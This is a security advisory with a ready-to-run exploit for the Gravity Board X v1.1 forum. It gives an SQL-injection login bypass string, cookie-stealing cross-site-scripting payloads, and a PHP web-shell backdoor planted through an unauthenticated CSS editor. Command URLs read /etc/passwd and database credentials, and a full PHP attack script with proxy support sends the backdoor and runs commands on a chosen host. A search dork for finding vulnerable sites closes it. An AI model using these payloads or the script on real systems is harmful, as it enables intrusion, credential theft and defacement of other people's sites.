4.22 07/08/2005 Gravity Board X v1.1 (possibly prior versions) Remote code execution, SQL Injection / Login Bypass, cross site scripting, path disclosure poc software: author site: http://www.gravityboardx.com/ a) Sql Injection / Login Bypass: A user can bypass login check and grant administrator privileges on target system: login: ' or isnull(1/0) /* password: whatever b) Cross site scripting poc: b.1)After he login as administrator he can edit template to insert evil javascript code. Try to insert at the end of the template these lines: </STYLE> <script>alert(document.cookie)</script> b.2)A user can craft a malicious url like this to access target user cookies: http://[target]/[path]/deletethread.php?board_id=";><script>alert(document.cookie)</script> c) Remote commands/php code execution: c.1) Editing the template, attacker can leave a backdoor in target system, example, at the end of template: </STYLE> <?php error_reporting(0); //to show no errors when page is called normally system($HTTP_GET_VARS[cmd]); ?> After, the attacker can launch commands by this urls: http://[target]/[path]/index.php?cmd=ls%20-la to list directories... http://[target]/[path]/index.php?cmd=cat%20/etc/passwd to see Unix /etc/passwd file http://[target]/[path]/index.php?cmd=cat%20config.php to see database username/password c.2) An IMPORTANT NOTE: You can edit template without to be logged in as administator, calling editcss.php script, look at the code of this script: if($fp = fopen('gbxfinal.css','w')){ fwrite($fp, $csscontent); fclose($fp); echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=index.php?action=admin">'; }else{ echo 'Gravity Board X was unable to save changes to the CSS template.'; } a user can easily deface the forum and/or insert a backdoor calling an url like this: http://[target]/[path]/editcss.php?csscontent=</style><?php%20system($HTTP_GET_VARS[cmd]);%20?> then execute commands: http://[target]/[path]/index?cmd=[command] this my php exploit code, run it from Apache: <?php /* 4.22 07/08/2005 Gravity Board X v1.1 (possibly prior versions) remote code execution by rgod site: http://rgod.altervista.org make these changes in php.ini if you have troubles with this script: allow_call_time_pass_reference = on register_globals = on */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo '<head><title>Gravity Board X v1.1 remote commands execution</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body,td,th {color: #00FF00;} body {background-color: #000000;} .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; font-style: italic; } --> </style></head> <body> <p class="Stile6">Gravity Board X v1.1 (possibly prior versions) remote commands execution</p> <p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org"; target="_blank">http://rgod.altervista.org</a></p> <table width="84%" > <tr> <td width="43%"> <form name="form1" method="post" action="'.$SERVER['PHP_SELF'].'?path=value&host=value&port=value&command=value&proxy=value"> <p> <input type="text" name="host"> <span class="Stile5">hostname (ex: www.sitename.com) </span></p> <p> <input type="text" name="path"> <span class="Stile5">path (ex: /flatnuke/forum/ or /forum/ just /) </span></p> <p> <input type="text" name="port"> <span class="Stile5">specify a port other than 80 (default value) </span></p> <p> <input type="text" name="command"> <span class="Stile5">a Unix command, example: ls -la to list directories, cat /etc/passwd to show passwd file </span></p> <p> <input type="text" name="proxy"> <span class="Stile5">send exploit through an HTTP proxy (ip:port) </span></p> <p> <input type="submit" name="Submit" value="go!"> </p> </form></td> </tr> </table> </body> </html>'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo '<table border="0"><tr>'; while ($ii <= strlen($headeri)-1) { $htmli=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo "<td> </td>"; for ($li=0; $li<=15; $li++) { echo "<td>".$headeri[$li+$ki]."</td>"; } $ki=$ki+16; echo "</tr><tr>"; } if (strlen($htmli)==1) {echo "<td>0".$htmli."</td>";} else {echo "<td>".$htmli."</td> ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo "<td>  </td>"; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo "<td>".$headeri[$li]."</td>"; } echo "</tr></table>"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; if ($proxy<>'') { $c = preg_match_all($proxy_regex,$proxy,$is_proxy); if ($c==0) { echo 'check the proxy...<br>'; die; } } if (($path<>'') and ($host<>'') and ($command<>'')) { //Gravity forum default template $template='A:link, A:visited, A:active { TEXT-DECORATION: none; COLOR: #E6B400; } A:hover { TEXT-DECORATION: underline; } p { FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px; COLOR: #FFFFFF; BACKGROUND: transparent; } body { FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px; COLOR: #FFFFFF; BACKGROUND: #101010; } /* FONTS */ .headerfont { FONT-FAMILY: Verdana; FONT-SIZE: 9pt; FONT-WEIGHT: bold; COLOR: #DCDCDC; } .headerfont2 { FONT-FAMILY: Verdana; FONT-SIZE: 9pt; FONT-WEIGHT: bold; COLOR: #FFFFFF; } .categoryfont { FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #FFFFFF; } .mainlinkfont { FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #006699; } .navfont { FONT-FAMILY: Arial; FONT-SIZE: 8pt; FONT-WEIGHT: bold; COLOR: #000000; } .navheader { FONT-FAMILY: Tahoma; FONT-SIZE: 14pt; FONT-WEIGHT: bold; COLOR: #000000; } .profilefont { FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px; } .small { FONT-FAMILY: Verdana; FONT-SIZE: 10px; } .subjectfont { FONT-FAMILY: Verdana; FONT-SIZE: 11px; COLOR: #006699; } .welcomefont { FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #FFFFFF; } /* MAIN TABLES */ .station { BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 1px; PADDING: 4; BACKGROUND: #222222; } .main { BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 1px; PADDING: 4; BACKGROUND: #181818; } .post { BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 0px; BACKGROUND: #202020; BORDER-COLLAPSE: collapse; } /* OTHER */ .textbox { COLOR: #FFFFFF; background: #606060; border: 1px inset #C0C0C0; font-size: 8pt; FONT-FAMILY: Verdana; } .button { COLOR: #FFFFFF; BACKGROUND: #707070; FONT-FAMILY: Verdana; FONT-WEIGHT: bold; BORDER-STYLE: solid; BORDER-COLOR: #999999; BORDER-WIDTH: 2px; } /* TABLE CELLS */ .header { BACKGROUND-IMAGE: url(images/skin/header_dark.gif); } .row1 { BACKGROUND: #303030; PADDING: 4px; } .row2 { BACKGROUND: #202020; PADDING: 4px; } .row3 { BACKGROUND: #404040; PADDING: 4px; } .floatrow { BACKGROUND: #4A4A4A; PADDING: 4px; } .rollover { BACKGROUND: #808080; PADDING: 4px; CURSOR: hand; }'; //setup new template if ($port=='') {$port=80;} $packet="GET "; if ($proxy<>'') {$packet.="http://".$host;} $packet.= $path."editcss.php?csscontent=".urlencode($template); //cut next line to reset template... $packet.= urlencode("</style><?php error_reporting(0);system(".'$HTTP_GET_VARS[cmd]'."); ?>"); $packet.=" HTTP/1.0\r\n"; $packet.="Accept: */*\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else {$parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } if (!$ock) {echo 'Not connected to target...'; die;} //debugging... show($packet); fputs($ock,$packet); fclose($ock); $packet="GET "; if ($proxy<>'') {$packet.="http://".$host;} $packet.=$path."index.php?cmd=".urlencode($command)." HTTP/1.0\r\n"; $packet.="Accept: */*\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else {$parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } if (!$ock) {echo 'Not connected to target...'; die;} //debugging... show($packet); fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); echo "If Gravity Forum is unpatched and vulnerable, now you will see ".htmlentities($command)." output inside html...<br>"; echo nl2br(htmlentities($html)); } ?> It's also possible to disclose path: d) path disclosure: http://[target]/[path]/deletethread.php?perm=1 http://[target]/[path]/ban.php http://[target]/[path]/addnews.php http://[target]/[path]/banned.php http://[target]/[path]/boardstats.php http://[target]/[path]/adminform.php http://[target]/[path]/forms/admininfo.php http://[target]/[path]/forms/announcements.php http://[target]/[path]/forms/banform.php ans so on...calling scripts in /forms directory googledork: "Powered by Gravity Board" rgod site: http://rgod.altervista.org mail: retrogod at aliceposta it original advisory: http://www.rgod.altervista.org/gravity.html
